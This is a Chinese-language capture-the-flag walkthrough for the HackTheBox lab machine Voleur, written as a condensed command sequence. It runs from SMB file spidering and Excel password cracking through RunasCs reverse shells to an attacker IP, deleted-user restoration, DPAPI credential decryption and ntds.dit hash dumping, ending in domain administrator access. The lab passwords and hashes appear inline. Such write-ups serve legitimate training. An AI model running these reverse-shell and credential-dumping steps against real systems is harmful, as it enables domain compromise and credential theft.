hackthebox 第八赛季的新靶机 Voleur,需要熟悉SMB敏感文件泄露,Excel密码破解,kerberos票据,恢复删除用户,DPAPI提权,ntds解密,最终拿到域控权限。
这篇文章只写主要攻击流程,有经验的师傅们可以跟着速通,如果希望有详细writeup请在评论区浏览哦
靶机地址
https://app.hackthebox.com/machines/670
适合读者
√ 红队渗透测试人员
√ 企业安全运维人员
√ CTF竞赛战队
√ 想掌握链式攻击思维的安全从业者
User flag
smb 探测
nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k -M spider_plus -o DOWNLOAD_FLAG=True
Excel破解
破解出来是个密码本
office2john Access_Review.xlsx > xlsx.hash
john --wordlist=/usr/share/wordlists/rockyou.txt xlsx.hash
svc_winrm 用户
kerberos客户端配置vi /etc/krb5.conf
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = true
rdns = false
[realms]
VOLEUR.HTB = {
kdc = DC.voleur.htb
admin_server = DC.voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB
登录得到第一个 flag
impacket-getTGT 'voleur.HTB/svc_winrm:AFireInsidedeOzarctica980219afi'
export KRB5CCNAME=svc_winrm.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb
Root flag
Todd.Wolfe 用户
反弹 svc_ldap shell
.RunasCs.exe svc_ldap M1X.....T5Vn cmd.exe -r 10.10.14.10:4446
查找并恢复删除的用户
powershell
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-....69db'
继续反弹shell 得到 Todd.Wolfe 权限
.RunasCs.exe Todd.Wolfe Nig.....on14 cmd.exe -r 10.10.14.10:4447
jeremy.combs 用户
找到 DPAPI
C:ITSecond-Line SupportArchived Userstodd.wolfeAppDataRoamingMicrosoftProtectS-1-5-21-3927696377-1337352550-2781715495-1110 8949382-134f-4c63-b93c-ce52efc0aa88
C:ITSecond-Line SupportArchived Userstodd.wolfeAppDataRoamingMicrosoftCredentials772275FAD58525253490A9B0039791D3
解密,得到 jeremy.combs 用户密码
impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password 'NightT1meP1dg3on14' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
impacket-dpapi credential -f 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
域管
反弹shell 拿到 jeremy.combs 交互权限
.RunasCs.exe jeremy.combs qT3V9...W4m cmd.exe -r 10.10.14.10:4448
拖回本地发现是域控的ntds和system等文件
scp -i id_rsa -P 2222 -r "[email protected]:/mnt/c/IT/Third-Line Support/Backups" ./
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
票据登录 administrator
impacket-getTGT -hashes aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2 'voleur.HTB/administrator'
export KRB5CCNAME=administrator.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb
原文始发于微信公众号(红队安全圈):HTB 第八赛季Voleur靶机:从SMB到域控 (速通版)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论